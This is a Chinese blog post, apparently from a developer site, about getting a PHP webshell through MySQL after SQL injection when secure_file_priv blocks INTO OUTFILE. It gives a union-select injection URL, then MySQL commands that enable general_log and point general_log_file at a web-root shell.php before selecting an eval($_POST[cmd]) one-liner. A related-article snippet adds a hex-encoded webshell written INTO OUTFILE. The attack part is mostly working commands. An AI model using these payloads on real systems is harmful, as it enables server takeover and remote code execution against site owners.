sql注入怎么使用linux命令,SQL注入写shell不成功后

最新推荐文章于 2024-04-06 04:22:46 发布
最新推荐文章于 2024-04-06 04:22:46 发布
阅读量402 收藏
点赞数
文章标签: sql注入怎么使用linux命令

66b52468c121889b900d4956032f1009.png

8种机械键盘轴体对比

本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?

之前遇到sql注入,且是root权限后,很容易直接写进去shell。现在的Mysql数据库的安全性也高了,即使注入得到mysql的root权限,有时候还是写不进去shell。

SQL 注入写 shellhttp://127.0.0.1:8000/waf/test.php?id=-1' union select 1,2,3 --+

c879255ba5530cb9a783ad2f13b957bd.png

root权限

78f63c21594dcd818301511e7d1a0982.png

写一句话的时候,报错。如果能进入phpmyadmin后台,可以试试一个方法。

1145f1f8fe8a432914058f2e6c0dc148.png

就是--secure-file-priv的问题。

本地测试。

Mysql导出文件时报错mysql> select host from mysql.user into outfile 'E:\test\1.txt';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv opti

on so it cannot execute this statement

报错原因:secure_file_priv设置了指定目录,需要在指定目录下进行数据导出。mysql> show variables like '%secure%';

+------------------+-------+

| Variable_name | Value |

+------------------+-------+

| secure_auth | OFF |

| secure_file_priv | NULL |

+------------------+-------+

2 rows in set (0.00 sec)

secure_file_priv 参数为空,表示没有可以导出的目录。这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。这些操作需要用户具有FILE权限。

如果这个参数为空,这个变量没有效果;

如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创建它;

如果这个参数为NULL,MySQL服务会禁止导入和导出操作。这个参数在MySQL 5.7.6版本引入

执行一下命令,在终端是修改不了secure_file_priv的值的。mysql> show variables like '%secure%';

+------------------+-------+

| Variable_name | Value |

+------------------+-------+

| secure_auth | OFF |

| secure_file_priv | NULL |

+------------------+-------+

2 rows in set (0.20 sec)

mysql> set global secure_file_priv = 'D:\phpStudy\www\waf\shell\1.txt';

ERROR 1238 (HY000): Variable 'secure_file_priv' is a read only variable

此时是root权限,into outfile写不了文件。这个时候,如果能登录到phpmyadmin,可以尝试一个方法。

在phpmyadmin后台中,查看全局变量:找到general log file和general log

将general log设置为ON

general log file 设置为shell的物理地址。

930fa3b0aef01a84894e0c2cb170a5cc.png

再执行一个写一句话的SQL语句。虽然还有报错,但是已经写入进去了。

1145f1f8fe8a432914058f2e6c0dc148.png

在D:phpStudywwwwafphpinfo.php中可以看到写入的php代码。

5b14c06624879f087ebd82ce74539c38.png

访问。

dea26703c530ae8e9605852177252ee2.pnggeneral_log

Command-Line Format --general-log

System Variable Name general_log

Scope Global

Dynamic Yes

Permitted Values Type boolean

Default OFF

Whether the general query log is enabled. The value can be 0 (or OFF) to disable the log or 1 (or ON) to enable the log. The default value depends on whether the --general_log option is given. The destination for log output is controlled by the log_output system variable; if that value is NONE, no log entries are written even if the log is enabled.

general_log_file

Command-Line Format --general-log-file=file_name

System Variable Name general_log_file

Scope Global

Dynamic Yes

Permitted Values Type file name

Default host_name.log

The name of the general query log file. The default value is host_name.log, but the initial value can be changed with the --general_log_file option.

如果登录不了phpmyadmin后台,试试能登录mysql终端吗?可以试着来执行以下命令。show variables like '%general%'; #查看配置

set global general_log = on; #开启general log模式

set global general_log_file = 'D:\phpStudywww\waf\shell.php'; #设置写入shell路径

select '<?php eval($_POST[cmd]);?>' #写入shell

window环境下在my.ini中设置 secure-file-priv="D:/phpStudy/www/waf" 为数据库的导入和导出路径。

Ubuntu环境下

SELECT的SELECT … INTO形式可以使查询结果存储在变量中或写入文件中。导出数据到文本文件中。SELECT … INTO OUTFILE将选定的行写入文件。可以指定列和行结束符以产生特定的输出格式。

SELECT … INTO DUMPFILE将单行写入文件而不使用任何格式。outfile

区别:mysql> select host from mysql.user into outfile 'D:/phpStudy/www/waf/test.txt';

Query OK, 3 rows affected (0.00 sec)

内容:127.0.0.1

::1

localhostdumpfile

mysql> select host from mysql.user into dumpfile ‘D:/phpStudy/www/waf/test1.txt’

;

ERROR 1172 (42000): Result consisted of more than one row

只能导出一行内容。

若把一个可执行2进制文件用into outfile函数导出,导出后可能会被破坏,因为into outfile函数会在行末写入新行,并且会转义换行符。这样2进制可执行文件会被破坏。这个时候用into dumpfile就能导出一个完整的可执行的2进制文件。

参考

西嬿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详解SQL注入–安全(二)
01-19
在前面:在前两天初学SQL注入的基础上,继续在Metasploitable-Linux环境下进行练习。 一、前面学习的SQL注入,那么当然就有防注入。由于web注入危害较大,各种防御技术也层出不穷。 1、程序猿在代码时会有意识的...
SQL注入GetShell的方法(1)
forinput的博客
05-06 3452
SQL注入getshell的五中方式
DVWA(linux下)利用sqlmap进行--os-shell注入不能成功的错误处理
Spwpun的博客
11-16 9505
报错情况: 我在自己的kali linux虚拟机下面安装了DVWA渗透测试系统以便自己进行渗透测试的基础学习,在进行sqli(sql injection)-low级别的测试的时候,利用sqlmap进行注入,加上–os-shell参数获取shell(即系统下的命令行,windows下的cmd,linux下的terminal),发现不能执行。 最后总是报这样的错,unable to uploa...
sqlshell原理_sql注入shell的条件,网络安全高级工程师必备知识
最新发布
m0_61369227的博客
04-06 1162
在上述条件满足后,执行Sqlmap,设置对应的语言、web目录,Sqlmap会通过outfile函数将在指定目录生成两个php文件,一个文件用于文件上传,一个文件用于接受命令参数执行系统命令此处有个奇怪的点是上传的命令执行文件我并没有在mysql日志中找到记录,猜测是通过有上传功能的那个php文件上传的,因为access.log中有访问记录,但由于是POST提交只记录了请求行,并没有请求内容。如果有大佬知晓,麻烦告知一二。
sql注入shell
weixin_51646864的博客
04-23 6702
靶场练习一下sql注入shell方式
搬砖笔记-SQL注入shell的语句
WM_NNXX的博客
08-25 2434
SQL注入shell的几种语句 需要绝对路径和权限。 union select 后入 lines terminated by 入 lines starting by 入 fields terminated by 入 COLUMNS terminated by 入 union select 后入 最常见的入方式,union select 后跟 into outfile 语句 http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,’<?php p
命令注入讲解ppt.pptx
08-10
命令注入攻击最初被关注到,是 Shell 命令注入攻击(所以最初也被称为 Shell 命令注入攻击),由挪威一名程序员在 1997 年意外发现的。最常见的命令注入攻击形式是 SQL 命令注入攻击(简称 SQL 注入),是指恶意黑客...
sqlmap最新版.zip
10-17
用于寻找SQL注入漏洞,这是从Kali Linux中提取的最新版,增加最优的自定义配置
太原理工大学网络攻击与防御实验指导书-2022年
03-03
实验一关注MS08_067漏洞的验证与利用,实验二涉及SQL注入靶场练习,实验三和实验四分别探讨文件上传漏洞的利用与防护以及文件包含漏洞的利用与防护。 实验一,MS08_067漏洞验证与利用,是基于著名的MS08-067漏洞,...
migrate-Java-EE-app-to-azure:将现有的 Java EE 工作负载迁移到 Azure
05-31
应用程序的数据到 Azure Database for PostgreSQL、MySQL 和/或 SQL 数据库。 目录 您将迁移到云的内容 您将迁移著名的 Sun 2003 Java EE Blue Print 示例应用程序。 样本的最新版本使用: Java SE 8 Java EE 7 ...
sql注入getshell的几种方式
热门推荐
good good study
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
MySQL注入入WebShell的几种方式
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
渗透测试-sql注入getshell的几种方式
lza20001103的博客
08-19 895
渗透测试-sql注入getshell的几种方式 文章目录渗透测试-sql注入getshell的几种方式一. into outfile(1)看secure-file-priv参数的值 介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell。 一. into outfile 利用条件 此方法利用的先决条件 web目录具有权限,能够使用单引号 知道网站绝对路径(根目录,或则是根目录往下的目录都行) secure_file_priv没有具体值(在mysql/m
SQL注入shell权限
CP1024的博客
01-21 3357
SQL注入shell权限 需要的条件 1. root权限 2. 知道网站的物理绝对路径 3. load_file() 开启 即 secure_file_priv 无限制 可以通过select @@secure_file_priv;查询 (1):如果为NULL,则不能入 (2):如果为空,可以在任意文件位置下入 (3):如果为一个路径,可以在该文件路径入 4. 有入权限 联合入 ?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into
sqlshell原理
xyxyxyxyy的博客
09-14 768
主要阐述了sqlmap工具webshell到mysql中的原理
sql注入shell
jingxiaoxiong459的博客
08-01 300
id=-1' union select 1,2,0x3c3f706870206576616c2840245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+ 尝试将一句话木马shell.php放入网站根目录。1.先将mysql.ini配置文件添加secure_file_priv = '',让secure_file_priv 不表示任何值。3.准备一句话木马<?
linux sql注入防护,linux之mysql数据库搭建及sql注入和防御
weixin_30738065的博客
05-15 233
linux之mysql数据库搭建及sql注入和防御发布时间:2020-04-22 13:24:53来源:51CTO阅读:2940作者:wt7315栏目:数据库mysql中文手册下载地址:http://down.51cto.com/data/2244392sql注入各种姿势:http://wt7315.blog.51cto.com/10319657/1828167sqlmap注入神器详解:http:...
sql注入(4)mysql注入
c10udz的博客
04-13 4697
1.MySQL5.x结构框架 在MySQL 5.0以上版本中,为了方便管理,默认定义了information_schema数据 库,用来存储数据库元信息,其中经常用到的表有:schemata(记录数据库名),tables(记录表名),columns(列名或字段名) 在schemata表中,schema_name(记录数据库名) 在tables表中,table_schema(记录存储的数据库名),table_name(表名)(schema_name和table_name都记录了MySQL中所有的数据库名
shell脚本执行sql
06-28
### 回答1: shell脚本可以通过调用mysql命令执行SQL语句。例如,可以使用以下命令执行SQL语句: mysql -h主机名 -u用户名 -p密码 数据库名 -e "SQL语句" 其中,主机名是数据库所在的主机名,用户名和密码是数据库的登录凭据,数据库名是要执行SQL语句的数据库名称,SQL语句是要执行的SQL语句。 例如,以下是一个简单的shell脚本,用于执行SQL语句并将结果输出到文件中: #!/bin/bash mysql -hlocalhost -uroot -p123456 testdb -e "SELECT * FROM users" > output.txt 该脚本将连接到名为testdb的数据库,并执行SELECT * FROM users语句,将结果输出到output.txt文件中。 ### 回答2: Shell脚本是一种用于Unix和Linux系统的脚本语言,可以用于管理文件系统、执行命令等。在Shell脚本中,我们可以使用各种命令和工具来完成一些常见的任务,其中SQL是一个常见的用途之一。 执行SQL语句需要一个数据库管理系统(DBMS),比如MySQL和Oracle等。一般来说,我们需要首先在Shell脚本中安装适合的DBMS并建立连接。连接数据库后,我们可以使用Shell脚本执行SQL语句并获取返回值。 我们可以使用以下命令Shell脚本中执行SQL: 1. mysql命令 这是一个常见的用于管理MySQL数据库的命令,可以直接在Shell执行SQL语句。我们可以使用以下命令来运行我们的SQL语句: mysql -u user -p password -h hostname -P port -D dbname -e "SQL statement" 其中,-u指定用户名,-p指定密码,-h指定主机名,-P指定端口号,-D指定数据库名,-e指定要执行的SQL语句。 2. psql命令 这是一个用于管理PostgreSQL数据库的命令,也可以在Shell执行SQL。类似于mysql命令,我们可以使用以下命令来运行我们的SQL语句: psql -h hostname -p port -U username -d dbname -c "SQL statement" 其中,-h指定主机名,-p指定端口号,-U指定用户名,-d指定数据库名,-c指定要执行的SQL语句。 有些时候,我们需要在Shell脚本中执行多条SQL语句或者使用循环来动态执行SQL,这就需要对Shell脚本的编程能力有一定的要求了。但无论在哪种情况下,我们都需要了解DBMS和Shell脚本的基本语法才能编出安全高效的代码。 ### 回答3: Shell脚本是一种在Unix或Linux操作系统中使用的编程语言,其脚本文件使用Shell解释器来执行执行SQL语句通常是在数据库中操作数据,与shell脚本紧密相关,尤其是在自动化任务方面。 在Shell脚本中执行SQL语句的过程: 1. 指定数据库连接信息:需要在Shell脚本中指定数据库连接信息,包括数据库服务器IP地址、数据库端口、登录名和密码等。可以将这些信息定义为变量,然后在脚本中使用这些变量,方便修改和维护。 2. 编SQL语句:在Shell脚本中编需要在数据库中执行的SQL语句。这些SQL语句可以是查询、插入、更新或删除等操作。注意在SQL语句时候要通过变量的方式传值,防止SQL注入。 3. 执行SQL语句:通过shell执行数据库客户端程序例如 mysql,postgresql,oracle等,同时传递执行的SQL语句。 4. 处理结果:执行SQL语句后,可以获取数据库执行结果,包括数据库操作受影响的行数、查询结果等。可以通过Shell脚本来处理这些结果,比如进行统计、分析、输出等操作。 在实际应用中,Shell脚本执行SQL通常被用于批量处理数据、自动化任务或数据备份等场景,如某个时期对数据进行统计,定时清洗过期数据或导出数据报表。通过Shell脚本执行SQL语句可以极大提高效率,降低手动操作过程中出错可能,保证数据一致性和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值